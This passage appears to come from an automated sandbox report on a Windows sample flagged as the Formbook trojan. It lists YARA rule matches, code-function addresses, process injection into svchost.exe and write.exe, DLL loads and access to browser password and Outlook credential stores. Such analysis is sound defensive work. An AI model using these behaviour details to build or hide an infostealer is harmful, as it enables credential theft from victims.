            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F0CB5
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047ECD1F
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0475AD00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0474ADE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04768DBF
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480CE93
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04750E59
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480EEDB
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480EE26
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04762E90
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047C4F40
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04770F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F2F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04792F28
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04758F0D
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0475CFE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04742FC8
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047CEFA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04752840
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0475A840
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0477E8F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047368B8
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04766962
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0481A9A6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047529A0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0474EA80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04806BD7
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480AB40
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04741460
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480F43F
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048195C3
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047ED5B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04807571
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04795630
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048016CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480F7B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480F0E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_048070E9
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047FF0CC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047570C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0473F172
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0478516C
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0475B1B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0481B16B
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F12ED
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0476B2C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047552A0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0473D34C
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480132D
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0479739A
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047C9C32
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480FCF2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04753D40
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0476FDC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04801D5A
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04807D73
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04759EB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480FFB1
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480FF09
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04713FD2
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04713FD5
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04751F92
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047BD800
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047538E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04759950
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0476B950
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047C3A6C
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047FDAC6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04807A46
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480FA49
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047EDAAC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_04795AA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047F1AA3
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0478DBF9
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047C5BF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0480FB76
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0476FB80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00541A70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0053C9C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0053C9B7
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0053CBE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0053AC60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005450F0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005432DB
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005432E0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0055B6B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456E424
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456C678
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456E7BC
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456E304
            Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456D828
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 047CF290 appears 105 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 04785130 appears 50 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 047BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 04797E54 appears 111 times
            Source: C:\Windows\SysWOW64\write.exe | Code function: String function: 0473B970 appears 279 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 278 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: String function: 00445AE0 appears 65 times
            Source: Z6s208B9QX.exe, 00000000.00000003.1281513646.0000000004AA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Z6s208B9QX.exe
            Source: Z6s208B9QX.exe, 00000000.00000003.1286509448.0000000004C4D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Z6s208B9QX.exe
            Source: Z6s208B9QX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@13/10
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | File created: C:\Users\user\AppData\Local\Temp\nonagglutinant
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Command line argument: ou 0_2_0040D6B0
Source: Z6s208B9QX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: write.exe, 0000000B.00000003.1916764326.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1914779751.0000000002BA2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002BA2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1914630931.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Z6s208B9QX.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | File read: C:\Users\user\Desktop\Z6s208B9QX.exe
Source: unknown | Process created: C:\Users\user\Desktop\Z6s208B9QX.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\write.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Z6s208B9QX.exe | Static file information: File size 1403415 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UCAmCgWJyh.exe, 0000000A.00000000.1650413823.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp, UCAmCgWJyh.exe, 0000000D.00000000.1799667591.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: Z6s208B9QX.exe | Static PE information: real checksum: 0xa961f should be: 0x15762c
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0041385D push edx; retf 8_2_004138EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040D829 push esp; ret 8_2_0040D801
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004138D8 push edx; retf 8_2_004138EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004138E3 push edx; retf 8_2_004138EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00414913 push ds; ret 8_2_00414914
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040D238 pushad ; iretd 8_2_0040D23A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00403300 push eax; ret 8_2_00403302
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040D4E3 push edx; retf 8_2_0040D4EB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040D77F push esp; ret 8_2_0040D801
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037309AD push ecx; mov dword ptr [esp], ecx 8_2_037309B6
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047127FA pushad ; ret 11_2_047127F9
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0471225F pushad ; ret 11_2_047127F9
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0471283D push eax; iretd 11_2_04712858
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_047409AD push ecx; mov dword ptr [esp], ecx 11_2_047409B6
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005420D1 push ecx; iretd 11_2_005420DA
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005420FC push FFFFFF8Fh; iretd 11_2_00542108
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00542255 push ebx; iretd 11_2_00542256
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0054055A push edx; retf 11_2_005405EC
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005405D5 push edx; retf 11_2_005405EC
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_005405E0 push edx; retf 11_2_005405EC
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00541610 push ds; ret 11_2_00541611
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_00549B45 pushad ; ret 11_2_00549B47
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0054DB30 push eax; retf 59D6h 11_2_0054DD16
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456C678 pushad ; retf 11_2_0456C7CD
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456C678 push 0000001Ch; iretd 11_2_0456C810
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456C7D7 push 0000001Ch; iretd 11_2_0456C810
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0456C7B7 pushad ; retf 11_2_0456C7CD
